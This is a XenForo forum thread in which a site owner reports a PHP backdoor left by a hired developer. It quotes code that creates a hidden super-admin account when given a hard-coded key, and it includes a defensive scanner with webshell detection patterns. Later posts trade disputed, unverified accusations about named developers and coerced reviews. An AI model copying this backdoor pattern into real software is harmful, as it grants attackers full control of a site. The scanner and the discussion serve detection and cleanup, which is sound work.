XF 2.2 XenForo developer may have added an exploit file

MR X

So I hired a dev on Fiverr to make me an addon. It took way too long to complete by the agreed time frame, so I fired him, then some time later re-hired him to actually finish it. Garbage work was done, but apparently he may or may not have uploaded a file named xf.php in /home/domain-name/public_html/data/xf.php. This is not an official XenForo file, is it? Because within it is:

PHP:
if ($key == 'dfdasfasfsjd544fjjkl') {
    // Create a new user with random credentials
    $registration = \XF::service('XF:User\Registration');
    $input['username'] = $randomString;
    $input['email'] = "$randomString@gmail.com";
    $input['password'] = $randomString;
    $registration->setFromInput($input);
    $registration->skipEmailConfirmation(true);
    $user = $registration->save();

    // Force admin privileges
    $user->secondary_group_ids = [3, 8, 5];  // Elevated groups
    $admin = \XF::app()->em()->create('XF:Admin');
    $admin->user_id = $user->user_id;
    $input['is_super_admin'] = true;
    $form->basicEntitySave($admin, $input);
    $form->run();

    echo $randomString;  // Prints the generated credentials
}

That is just the gist of what all was in it.

Appreciate some support, thank you.
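The snippet above amounts to a keyed account-creation backdoor: anyone who sends the string compared against $key gets a fresh account with a random username and password, email confirmation skipped, an XF:Admin entity with the super-admin flag set, and the credentials echoed back in the response. One way to hunt for this class of file across an install is to flag PHP sitting under directories that, in a stock XenForo 2 layout, hold only uploads and cache (data/ and internal_data/; this is an assumption based on the default layout), and to grep for the calls visible in the snippet. The scanner below is an added example written for this thread, not XenForo code and not anything posted by the participants; the tree it scans is constructed in a temporary directory and contains one harmless core-style file, one avatar, and a backdoor modelled on the quoted snippet.

```python
"""Hunt for dropped PHP backdoors in a XenForo 2 web root.

Hypothetical scanner written as an example for this thread; it is not part
of XenForo. It flags (1) executable PHP sitting under upload/cache directories
and (2) the account-creation and privilege-escalation calls seen in the
quoted xf.php, plus generic webshell tells.
"""
import re
import sys
import tempfile
from pathlib import Path

# Assumption: stock XF2 keeps avatars, attachments and cache under these two
# directories, so any PHP found beneath them is foreign code.
NO_PHP_DIRS = {"data", "internal_data"}
PHP_SUFFIXES = {".php", ".phtml", ".php5", ".php7", ".phar"}

# Indicators lifted from the quoted snippet plus common webshell primitives.
INDICATORS = {
    "registration_service": re.compile(r"XF:User\\Registration"),
    "skip_email_confirm": re.compile(r"skipEmailConfirmation\s*\(\s*true"),
    "super_admin_flag": re.compile(r"is_super_admin['\"]?\s*\]?\s*=\s*true", re.I),
    "hardcoded_key_check": re.compile(r"\$\w+\s*===?\s*['\"][A-Za-z0-9_\-]{12,}['\"]"),
    "request_param": re.compile(r"\$_(GET|POST|REQUEST|COOKIE)\s*\["),
    "code_exec": re.compile(r"\b(eval|system|shell_exec|passthru|exec|popen)\s*\("),
    "base64_payload": re.compile(r"base64_decode\s*\("),
}


def scan_file(path, root):
    """Return a finding dict for one file, or None if nothing looks wrong."""
    rel = path.relative_to(root)
    in_upload_dir = bool(rel.parts) and rel.parts[0] in NO_PHP_DIRS
    is_php = path.suffix.lower() in PHP_SUFFIXES
    if not (is_php or in_upload_dir):
        return None  # ordinary non-PHP file outside the upload dirs
    try:
        text = path.read_text(errors="replace")
    except OSError:
        return None
    findings = []
    # A PHP file, or any file carrying a PHP open tag, under data/ or
    # internal_data/ is foreign regardless of what it does.
    if in_upload_dir and (is_php or "<?php" in text[:4096]):
        findings.append("php_in_upload_dir")
    for name, rx in INDICATORS.items():
        if rx.search(text):
            findings.append(name)
    if not findings:
        return None
    # The chain from the quoted file: register a user, then mark it super admin.
    chain = {"registration_service", "super_admin_flag"} <= set(findings)
    return {"file": rel.as_posix(), "indicators": findings, "escalation_chain": chain}


def scan_tree(root):
    """Walk a web root and collect every flagged file, sorted by path."""
    root = Path(root)
    hits = []
    for p in sorted(root.rglob("*")):
        if p.is_file():
            r = scan_file(p, root)
            if r:
                hits.append(r)
    return hits


def demo():
    """Build a constructed tree (not a real install): one legitimate-looking
    core file, one avatar, and a backdoor modelled on the quoted snippet."""
    root = Path(tempfile.mkdtemp())
    (root / "src" / "XF").mkdir(parents=True)
    (root / "data" / "avatars").mkdir(parents=True)
    (root / "src" / "XF" / "App.php").write_text("<?php\nnamespace XF;\nclass App {}\n")
    (root / "data" / "avatars" / "l0.jpg").write_bytes(b"\xff\xd8\xff\xe0 not really a jpeg")
    (root / "data" / "xf.php").write_text(
        "<?php\n"
        "$key = $_GET['key'];\n"
        "if ($key == 'dfdasfasfsjd544fjjkl') {\n"
        "    $registration = \\XF::service('XF:User\\Registration');\n"
        "    $registration->skipEmailConfirmation(true);\n"
        "    $input['is_super_admin'] = true;\n"
        "}\n"
    )
    return scan_tree(root)


if __name__ == "__main__":
    target = sys.argv[1] if len(sys.argv) > 1 else None
    for hit in (scan_tree(target) if target else demo()):
        flag = " ESCALATION CHAIN" if hit["escalation_chain"] else ""
        print(f"{hit['file']}: {', '.join(hit['indicators'])}{flag}")
```

Run it against the real web root (for the path in the post, python3 scan.py /home/domain-name/public_html). Any hit under data/ or internal_data/ is foreign code whether or not the indicator list matches, since nothing legitimate should execute from there. Because the snippet echoes the generated string and uses it as username, email local part and password, the follow-up is to look for accounts you did not create in the user and admin tables and for requests to the dropped file carrying a key parameter in the web server access log, then remove the file and rotate every credential the attacker could have read from the server.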
 
He basically added a backdoor, like I said, but he also added advertisement code so he can profit on my website (ad code within the addon he was fixing up). I would say the bad actor dev's name, but I don't know if I can expose it on XF.
I've seen call-outs of bad devs here on XenForo. If he's using the site here to then do fraudulent or black-hat work, we need to know who it is, and you would be doing the community a great service. At the very least you should consider reporting this nabob to the admin here.
 
I'm curious, did you search up on fahad ashraf at all on this site? Seems like a lot of people hire devs without spending any time reading reviews... just make sure to ignore all the reviews from new users.

@forumSolution (tagged for no obvious relation to fahad....)
No, I didn't; I was more needing to immediately hire a dev. Should have done my research, I will be doing that next time. Well, hopefully not; a member of my community has 20+ years of web-dev experience, so I think I am good now :)

Also, I thought all Fiverr devs were checked by Fiverr themselves; I guess I was wrong.
 
Ya, definitely not me lol. I don't have a Fiverr account (never have, never will). I am also extremely picky on what type of projects I take on. I can assure you that I'd never be interested in a tiny project like this. It's large-scale CMS and sports-type addons that I focus on.

Hope you find the dude and kick his ass.
Didn't have any doubt that it was you. Also, my addon is no small feat, but I also won't go into details; I will say it would be like combining your showcase addon, addonlabs' thread filters addon, Thread Prefix Filter and Thread Thumbnail, as well as some other addons, into one "portal"-style addon for recently made threads.
 
Well, this is who I hired.
But again, I am not entirely sure it's the same dev.
Pretty baffled to find a rating of 4.9 of 5 there, based on 117 reviews. All of them overly positive to an extent that is hard to believe. And, with very few exceptions, the work was done for 50-100€ or even less, which does not really fit the kind of work described in the reviews (and does not fit any serious amount of custom software development that is more than a tiny-tiny fix). It seems that the reviews are not trustworthy, at least in the sense that if they are genuine, the reviewers probably don't have the slightest technical clue about anything, like your grandma going to a car workshop. Just for the laughs, one of the reviews as a screenshot:

[Screenshot, 2025-09-06 16:20]
Must have been a hell of a project, for less than 50€ and less than 1 day.
 
That, and that dev basically pleads or harasses you to make a really good review.
 
Without getting into it, that review was a lie and I was basically strong-armed into making it.

His addon was bad, but not that bad, but not what was needed (I also removed my review).
Why not report to XenForo devs that you were strong-armed by fahad, uhh I mean @forumSolution, into making that review?

Seriously, the people who are dumb enough to be forced to make reviews for him are just making it worse for everyone else that hires him.

And the XenForo team here thinks that is a diff person lol
 
forumSolution is a different dev than fahad, I am pretty sure.
 
On XenForo, reviews are always voluntary, members are free to share their own experiences if they wish. If a developer provides good service and someone is satisfied, they may choose to leave a review, but there’s no way to compel this.

From what I’ve read in this thread, the matter seems to have stemmed from a Fiverr-related incident. However, I noticed that Tajhay directed criticism towards @forumsolutions, even though the original poster clarified they are two separate individuals.

It’s a bit concerning to see this misunderstanding go unresolved, and I do hope XenForo can provide some clarity. It’s important that members are not mistakenly associated with situations they are not part of.
 
The review he left for the addon that was developed, which he said he was forced to leave, is on @forumSolution's review thread.

Which he has now deleted.
 
Why would the Fiverr dev point Mr X to that thread to post the coerced review, if it's two separate people? Defies logic.
 
Let me explain the logic: we made a deal here on XenForo. I did some small work for him, paid of course; he was happy, so then he gave me a review just like a normal client. I never forced him to write a review, why would I? I have no account on Fiverr lol
 